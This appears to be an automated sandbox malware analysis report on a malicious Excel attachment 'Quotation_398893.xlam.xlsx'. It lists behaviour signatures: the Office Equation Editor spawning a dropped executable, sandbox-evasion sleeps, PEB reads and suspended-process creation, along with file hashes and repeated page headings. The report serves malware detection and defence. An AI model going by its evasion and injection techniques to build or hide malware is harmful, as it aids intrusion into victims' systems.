Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Memory allocated: 130000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Memory allocated: 1A610000 memory reserve \| memory write watch			Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3524	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe TID: 3744	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe TID: 3676	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: EQNEDT32.EXE	Binary or memory string: hgkQx0bZZLJUrWxFmRPXH5Fsqo11MpdW7y4iFnOnBgrEaVSPNLYW4TshKdjMsbOzRssqClqFKcptnKiVR7MlMYdNRpaXBDtWntYcVysEChfG80eo8HF1qOQDLuzIxh0PLZVooQOzuQk7FYBbaMc58z9UBRMRq5fwFR8ClBIqeMUEp2DBytrkvNiT6v5kVPmNf2rZ2EV3Z1IPUSdnSPPmqc2TItZzbhF0ks4hHeutoxaQusMkBSexYi0kstFwlzx6eUCN
Source: EQNEDT32.EXE	Binary or memory string: ypwyU1OsJGoI9gzmwpH0ELmWtubn8HTSbmYovpXdNywAoujLuu5PbVYYmIJ2HCmQ0hS2SdxpQzOJu4uqKsVD0mAHqOA5Igb5YPIgyioyr6pkLRfobVBSMTnDVxqw817yfekmOMGb54uW2KClAZoAZsbuAnydfVRdlERMcpSFWhGfszcFOr0MXEitDfEEnPlZEv3RYPXQYlaCmh7nh9R69rJg5MHiS1ELUVF56Ohhb2WAflquVDmOM1YoAelAXbzSwleI
Source: EQNEDT32.EXE	Binary or memory string: UfbNZoESc6NLHOvdpfYbWygLBie8xAB8UF5CCYC8rXcwQ89Z8UylnvcEQFCy0JozdgH8li5ItoZiIxPg8PJQpowFXP9s7YQA3UbxvMnEtUcRYsbF1yyMHiWehjtcvvvxvCSSKVFCz49uqwcYviMLocJl2iq06RCcPLFOeBKVN6ctpAOt1AtB4aBpjvPnJ8BReTMYWRyPA7OA9boXRqxdid39vrzlC3lio5EkbI4DXdsXUGmlNIzUPnq0m5ziPDqi2kGi
Source: EQNEDT32.EXE	Binary or memory string: rEBr304tHgFsyzPPcXV8dAreVTPm9lBvcw6qv32bDfylApbmd54oUsycozejFWgyisg6C6HowVMtrRgj9QXz8PqWXRJejP6ZS9S2fnnOkMwgpVgBQgT3NRVHzzwwN3Rb6vw48odHvNGYpfd2k1OO0b1lRn4zw8lzwNgaLmoMjkptgZZCQcqRlYOvB0DDFI4dFeC16ONZSaB68uWZhcKbSyeeTmv13DPSKu1lBGMmO5scyIV3tAOHsUqpcGio8VoKRIiC
Source: EQNEDT32.EXE	Binary or memory string: eL6Q7la1TPigYMZLFUoxYNz1napOC0vPdcZ8aUz4VseqEmuNqZzBcxzwIENLfha9DMtXGsdf8nUUjzCsIJPvOdrUB1j6x8JwvyrH9qnxtZ3G6rg098rpuMspxMgJ8BNwIrF1IJl7Ja5pLKfuuR7ZB1L6Af0dDn5HqQoQj9nIwGPpVIQj8dxnHXWTKKUjEpi875N8TIBdI1lwceEeL7A9Cnh50lvGCEWeeFhnZdEKtExniJNo4IXIzhA7gN4sBtp0xJY6
Source: EQNEDT32.EXE	Binary or memory string: enqSmw50XklvAzsJAlS1muLkliuLOtKMkouxDqjvFCZ0Pk1VbMs6bGmvpk6tLA7HA6MXgsGOY95Caz1Q8xZaUgFEjUONkLOzQ6zpEwzax269jb8DGxK6S62p1MaSdMQe5BaVtvAd0FPWqUf2ZkwLYOQsElQn06WQemuDgk5iEBkyzZs3XjBwoThXr5j1vUvTfHkceI2yAGw9Cj4QjLpZFF8wSlFoQQxwf6tNoWHZKskjTuUIfyfstc1HZBnpVorzAe78

Contains functionality to read the PEB

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 1_2_0361079C mov edx, dword ptr fs:[00000030h]

1_2_0361079C

Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe

Memory allocated: page read and write | page guard

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\user\AppData\Local\Temp\opponbvew.exe C:\Users\user\AppData\Local\Temp\opponbvew.exe

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\opponbvew.exe VolumeInformation

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

ID:	1530599
Product:	CloudBasic
Start time:	09:41:51
Start date:	10.10.2024
Sample:	Quotation_398893.xlam.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	8ab8d813d3ca68c8effdb8abbf4a4f86
SHA1:	f26fa096a70eec2a9900e363f63a1e6cafe5e8d4
SHA256:	11a5d3add86410357163004a54f22335583b895a390e7eaf567e423ac7ccfeff
Filetype:	Excel Microsoft Office Open XML Format document (35004/1) 81.40%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	F5435E421FF6FCFC359478B4CF638358	107028E913C15EB20491BCDFD2597CE55BCD8FDA	9ED7ADB8DB639FB82E25A253FEC5AABF20F102BD54C6199BE44FDE9FE6841B74
C:\Users\user\AppData\Local\Temp\opponbvew.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	F5435E421FF6FCFC359478B4CF638358	107028E913C15EB20491BCDFD2597CE55BCD8FDA	9ED7ADB8DB639FB82E25A253FEC5AABF20F102BD54C6199BE44FDE9FE6841B74
C:\Users\user\Desktop\~$Quotation_398893.xlam.xls	data	797869BB881CFBCDAC2064F92B26E46F	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
C:\Users\user\Desktop\~$Quotation_398893.xlam.xlsx	data	797869BB881CFBCDAC2064F92B26E46F	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185

Windows Analysis Report
Quotation_398893.xlam.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report Quotation_398893.xlam.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Quotation_398893.xlam.xlsx